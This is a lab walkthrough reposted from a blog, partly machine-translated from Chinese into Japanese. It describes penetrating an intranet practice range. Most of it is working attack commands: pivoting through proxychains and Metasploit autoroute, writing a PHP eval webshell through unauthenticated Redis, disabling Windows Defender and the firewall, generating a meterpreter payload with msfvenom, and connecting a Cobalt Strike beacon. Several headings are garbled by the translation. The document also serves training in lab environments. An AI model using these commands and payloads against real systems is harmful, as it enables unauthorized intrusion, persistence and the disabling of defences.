イントラネットセキュリティ:イントラネットペネトレーション(イントラネットホストの脆弱性ターゲット射撃範囲Aの最高権限を取得)

イントラネットセキュリティ: イントラネットペネトレーション (イントラネットホストの最高権限を取得)

イントラネット トラバーサルは NAT トラバーサルとも呼ばれ、イントラネット ポートは外部ネットワークにマッピングされ、NAT デバイスを使用してプライベート TCP/IP ネットワーク内のホスト間の接続を確立します。ポート マッピングを通じて、外部ネットワーク上のコンピュータは内部ネットワーク上のコンピュータを見つけることができます。ポート マッピングは NAT アドレス変換の一種であり、その機能はパブリック ネットワーク上のアドレスをプライベート アドレスに変換することです。LAN 内の任意の PC またはサーバー上でイントラネット ペネトレーション クライアントを実行します。このとき、ドメイン名によって解決された IP アドレスは、LAN のゲートウェイ出口でパブリック ネットワークの IP アドレスとなり、ゲートウェイでポート マッピングを実行して、監視デバイスをポイントします。


目次:

イントラネットセキュリティ: イントラネットペネトレーション (イントラネットホストの最高権限を取得)

ネットワーク環境は以下を示します。

ホスト情報:

イントラネット侵入テスト:

(1) イントラネット ホストの検出:

(2) チャネルを構築します。

(3) イントラネット スキャン:

(4) イントラネットの浸透:

(5) オンライン MSF:

(6) オンラインCS:


免責事項:

この記事に記載されている仮想マシンおよびテクノロジを使用して、いかなる形式の攻撃を行うことも固く禁じられています。そうでない場合、その結果は自己責任となり、アップロード者は一切の責任を負いません。


ネットワーク環境は以下を示します。


ホスト情報:

ザ・ホスト

エクストラネット

イントラネット1 イントラネット2
カリ 192.168.0.101
勝利7 192.168.0.102 10.0.20.98
2016年に勝つ 10.0.20.99 10.0.10.111
2019年に勝つ 10.0.10.110

以前の Web サーバーの侵入: Web セキュリティ: Web サーバーの最高権限を取得する (脆弱な射撃場 1)_スイカ半分。のブログ - CSDN ブログ


イントラネット侵入テスト:

(1) イントラネット ホストの検出:

shell ipconfig            //查看 网卡的 网段信息.

主机探测和端口探测.

发现一台内网主机,IP为 10.0.20.99


(2)チャネルを構築します。

代理转发.【msf 代理】

run post/multi/manage/autoroute            // 添加路由

run autoroute -p                           // 查看路由


代理转发.【CS 代理】

查看代理信息.

修改配置 /etc/proxychains4.conf 文件

vim /etc/proxychains4.conf        //打开这个文件.


(3) イントラネット スキャン:

浏览器配置代理:

进行访问 第二层内网主机的 6379 端口( Redis 服务 )

proxychains4 redis-cli -h 10.0.20.99

proxychains4 redis-cli -h 【第二层内网 主机 IP 地址】


(4) イントラネットの浸透:

利用 Redis 未授权漏洞.
由于 10.0.20.99 这台机器开启了Web服务,我们要通过 Resis 未授权漏洞写入webshell,于是我们
需要知道网站的绝对路径,并且需要具有读写权限。

方法一:
我们也可以简单探测,有没有可能暴露敏感信息的文件
比如:/phpinfo.php 这些文件.(这个过程可以使用目录扫描等等方法.)
(Resis 未授权漏洞 默认路径: C:\phpStudy\PHPTutorial\www\)

方法二:
如果不是这个默认路径,则修改为路径: Redis写启动项(需要猜路径 猜用户名),定时自动执行bat脚本
上线或者反弹shell

因此我们写入 wenshell (一句话木马)
(1)proxychains4 redis-cli -h 10.0.20.99        //连接 Redis 服务.

(2)config set dir "C:/phpStudy/PHPTutorial/www/"    
//在网站的根目录下写进去一个脚本.(C:/phpStudy/PHPTutorial/www/ 是 win 默认路径)

(3)config set dbfilename bgxg.php                //脚本名称为 bgxg.php

(4)set 1 "<?php @eval($_POST['bgxg']);?>"        // 脚本内容(一句话木马)

(5)save                                          // 保存 刚刚写入的信息.

上传木马程序,需要关闭 Windows Denfder 

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

gpupdate /force

上传木马程序,需要关闭防火墙.

(1)Netsh advfirewall show allprofiles        // 查看防火墙配置

(2)netSh advfirewall set allprofiles state off        // 关闭防火墙


(5)オンライン MSF:

渗透 第二层 内网.[msf 代理]
run post/multi/manage/autoroute            // 添加路由

run autoroute -p                           // 查看路由

background                                 // 挂起 会话

重新再生成一个新的程序(木马)【用来渗透第二层内网.】

msfvenom -p windows/meterpreter/bind_tcp LHOST=192.168.0.101 LPORT=12345 -f exe > 12345.exe

set payload windows/meterpreter/bind_tcp       // 设置 payload 

set lport 12345                                // 设置 和程序(木马)的端口

set rhost 10.0.20.99                           // 设置 第二层内网的目标主机.

run                                            // 进行 测试.

利用 蚁剑 进行上传 程序(木马)到第二层主机中 并执行.


(6)オンラインCS   :

建立 Beacon TCP 监听器:

生成一个新程序木马.(要来渗透第二层内网的其他主机)

利用 蚁剑 进行上传 程序(木马)

connect 10.0.20.99 666

connect 第二层内网主机 IP 地址 木马的端口

        

         

          

おすすめ

転載: blog.csdn.net/weixin_54977781/article/details/131030577